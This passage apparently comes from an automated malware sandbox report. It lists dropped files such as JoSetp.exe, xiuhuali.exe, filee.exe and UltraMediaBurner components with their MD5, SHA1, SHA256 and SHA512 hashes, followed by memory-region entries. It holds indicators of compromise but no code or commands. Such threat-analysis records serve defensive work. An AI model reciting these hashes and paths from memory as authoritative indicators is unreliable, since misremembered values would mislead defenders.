                                                                                                                                      SHA512

                                                                                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\John_Ship.url
                                                                                                                                      MD5

                                                                                                                                      72825692a77bb94e1f69ef91bfbbff15

                                                                                                                                      SHA1

                                                                                                                                      db898f541f5e6e4305dfe469494d0ed1d4950395

                                                                                                                                      SHA256

                                                                                                                                      6e57ce08a3feecbb59a5b257660cc517793f1adb20b75d36a9d12f921fc826e7

                                                                                                                                      SHA512

                                                                                                                                      9a2c3ba9be966bb6f3ebf188578fa335a2583ce9c3ae94cbe3a044b02a339a9ca22b4a31e8c6076c720c8632fca6d1ebbc7a4575d0fe463cb4c526c187e333b8

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                                      MD5

                                                                                                                                      3bc84c0e8831842f2ae263789217245d

                                                                                                                                      SHA1

                                                                                                                                      d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                                      SHA256

                                                                                                                                      757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                                      SHA512

                                                                                                                                      f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                      MD5

                                                                                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                                      SHA1

                                                                                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                                      SHA256

                                                                                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                                      SHA512

                                                                                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                      MD5

                                                                                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                                      SHA1

                                                                                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                                      SHA256

                                                                                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                                      SHA512

                                                                                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-3U7OR.tmp\ultramediaburner.tmp
                                                                                                                                      MD5

                                                                                                                                      4e8c7308803ce36c8c2c6759a504c908

                                                                                                                                      SHA1

                                                                                                                                      a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                                      SHA256

                                                                                                                                      90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                                                      SHA512

                                                                                                                                      780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-3U7OR.tmp\ultramediaburner.tmp
                                                                                                                                      MD5

                                                                                                                                      4e8c7308803ce36c8c2c6759a504c908

                                                                                                                                      SHA1

                                                                                                                                      a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                                      SHA256

                                                                                                                                      90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                                                      SHA512

                                                                                                                                      780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-KQ2GS.tmp\Ultra.exe
                                                                                                                                      MD5

                                                                                                                                      cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                                      SHA1

                                                                                                                                      ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                                      SHA256

                                                                                                                                      0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                                      SHA512

                                                                                                                                      49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-KQ2GS.tmp\Ultra.exe
                                                                                                                                      MD5

                                                                                                                                      cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                                      SHA1

                                                                                                                                      ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                                      SHA256

                                                                                                                                      0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                                      SHA512

                                                                                                                                      49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-PT2A4.tmp\Install.tmp
                                                                                                                                      MD5

                                                                                                                                      45ca138d0bb665df6e4bef2add68c7bf

                                                                                                                                      SHA1

                                                                                                                                      12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                                                                      SHA256

                                                                                                                                      3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                                                                      SHA512

                                                                                                                                      cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                                                                    • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • \Program Files\install.dll
                                                                                                                                      MD5

                                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                      SHA1

                                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                      SHA256

                                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                      SHA512

                                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                    • \Program Files\install.dll
                                                                                                                                      MD5

                                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                      SHA1

                                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                      SHA256

                                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                      SHA512

                                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                    • \Program Files\install.dll
                                                                                                                                      MD5

                                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                      SHA1

                                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                      SHA256

                                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                      SHA512

                                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                    • \Program Files\install.dll
                                                                                                                                      MD5

                                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                      SHA1

                                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                      SHA256

                                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                      SHA512

                                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                      MD5

                                                                                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                      SHA1

                                                                                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                      SHA256

                                                                                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                      SHA512

                                                                                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                      MD5

                                                                                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                      SHA1

                                                                                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                      SHA256

                                                                                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                      SHA512

                                                                                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                      MD5

                                                                                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                      SHA1

                                                                                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                      SHA256

                                                                                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                      SHA512

                                                                                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                      MD5

                                                                                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                      SHA1

                                                                                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                      SHA256

                                                                                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                      SHA512

                                                                                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                      MD5

                                                                                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                      SHA1

                                                                                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                      SHA256

                                                                                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                                      SHA512

                                                                                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                      MD5

                                                                                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                      SHA1

                                                                                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                      SHA256

                                                                                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                                      SHA512

                                                                                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                      MD5

                                                                                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                      SHA1

                                                                                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                      SHA256

                                                                                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                                      SHA512

                                                                                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                      MD5

                                                                                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                      SHA1

                                                                                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                      SHA256

                                                                                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                                      SHA512

                                                                                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                      MD5

                                                                                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                      SHA1

                                                                                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                      SHA256

                                                                                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                                      SHA512

                                                                                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                                      MD5

                                                                                                                                      3bc84c0e8831842f2ae263789217245d

                                                                                                                                      SHA1

                                                                                                                                      d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                                      SHA256

                                                                                                                                      757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                                      SHA512

                                                                                                                                      f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                                      MD5

                                                                                                                                      3bc84c0e8831842f2ae263789217245d

                                                                                                                                      SHA1

                                                                                                                                      d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                                      SHA256

                                                                                                                                      757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                                      SHA512

                                                                                                                                      f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                                      MD5

                                                                                                                                      3bc84c0e8831842f2ae263789217245d

                                                                                                                                      SHA1

                                                                                                                                      d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                                      SHA256

                                                                                                                                      757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                                      SHA512

                                                                                                                                      f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                                      MD5

                                                                                                                                      25d9f83dc738b4894cf159c6a9754e40

                                                                                                                                      SHA1

                                                                                                                                      152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                                      SHA256

                                                                                                                                      8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                                      SHA512

                                                                                                                                      41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                      MD5

                                                                                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                                      SHA1

                                                                                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                                      SHA256

                                                                                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                                      SHA512

                                                                                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                      MD5

                                                                                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                                      SHA1

                                                                                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                                      SHA256

                                                                                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                                      SHA512

                                                                                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                      MD5

                                                                                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                                      SHA1

                                                                                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                                      SHA256

                                                                                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                                      SHA512

                                                                                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                      MD5

                                                                                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                                      SHA1

                                                                                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                                      SHA256

                                                                                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                                      SHA512

                                                                                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                      MD5

                                                                                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                                      SHA1

                                                                                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                                      SHA256

                                                                                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                                      SHA512

                                                                                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\is-3U7OR.tmp\ultramediaburner.tmp
                                                                                                                                      MD5

                                                                                                                                      4e8c7308803ce36c8c2c6759a504c908

                                                                                                                                      SHA1

                                                                                                                                      a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                                      SHA256

                                                                                                                                      90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                                                      SHA512

                                                                                                                                      780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\is-KQ2GS.tmp\Ultra.exe
                                                                                                                                      MD5

                                                                                                                                      cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                                      SHA1

                                                                                                                                      ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                                      SHA256

                                                                                                                                      0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                                      SHA512

                                                                                                                                      49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\is-KQ2GS.tmp\_isetup\_shfoldr.dll
                                                                                                                                      MD5

                                                                                                                                      92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                                                      SHA1

                                                                                                                                      3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                                      SHA256

                                                                                                                                      9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                                      SHA512

                                                                                                                                      9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\is-KQ2GS.tmp\_isetup\_shfoldr.dll
                                                                                                                                      MD5

                                                                                                                                      92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                                                      SHA1

                                                                                                                                      3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                                      SHA256

                                                                                                                                      9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                                      SHA512

                                                                                                                                      9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\is-KQ2GS.tmp\idp.dll
                                                                                                                                      MD5

                                                                                                                                      8f995688085bced38ba7795f60a5e1d3

                                                                                                                                      SHA1

                                                                                                                                      5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                                                                                      SHA256

                                                                                                                                      203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                                                                                      SHA512

                                                                                                                                      043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\is-PT2A4.tmp\Install.tmp
                                                                                                                                      MD5

                                                                                                                                      45ca138d0bb665df6e4bef2add68c7bf

                                                                                                                                      SHA1

                                                                                                                                      12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                                                                      SHA256

                                                                                                                                      3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                                                                      SHA512

                                                                                                                                      cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\is-TC0F9.tmp\_isetup\_shfoldr.dll
                                                                                                                                      MD5

                                                                                                                                      92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                                                      SHA1

                                                                                                                                      3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                                      SHA256

                                                                                                                                      9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                                      SHA512

                                                                                                                                      9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\is-TC0F9.tmp\_isetup\_shfoldr.dll
                                                                                                                                      MD5

                                                                                                                                      92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                                                      SHA1

                                                                                                                                      3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                                      SHA256

                                                                                                                                      9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                                      SHA512

                                                                                                                                      9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                                                    • memory/856-233-0x0000000001000000-0x000000000104B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/856-96-0x00000000009F0000-0x0000000000A3B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/856-97-0x00000000013A0000-0x0000000001410000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/856-236-0x0000000001A00000-0x0000000001A70000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/888-277-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      48KB

                                                                                                                                    • memory/952-153-0x000007FEF1EE0000-0x000007FEF2F76000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      16.6MB

                                                                                                                                    • memory/952-177-0x0000000000996000-0x00000000009B5000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      124KB

                                                                                                                                    • memory/952-146-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/952-151-0x0000000000990000-0x0000000000992000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/972-259-0x00000000006A0000-0x00000000006A2000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/972-257-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1096-60-0x0000000075281000-0x0000000075283000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1172-294-0x0000000004990000-0x0000000004991000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1172-295-0x0000000004992000-0x0000000004993000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/1192-99-0x0000000000230000-0x00000000002A0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1192-95-0x00000000FF91246C-mapping.dmp
                                                                                                                                    • memory/1248-283-0x00000000038F0000-0x0000000003907000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      92KB

                                                                                                                                    • memory/1292-171-0x00000000009A0000-0x00000000009A2000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/1292-193-0x00000000009C5000-0x00000000009C6000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

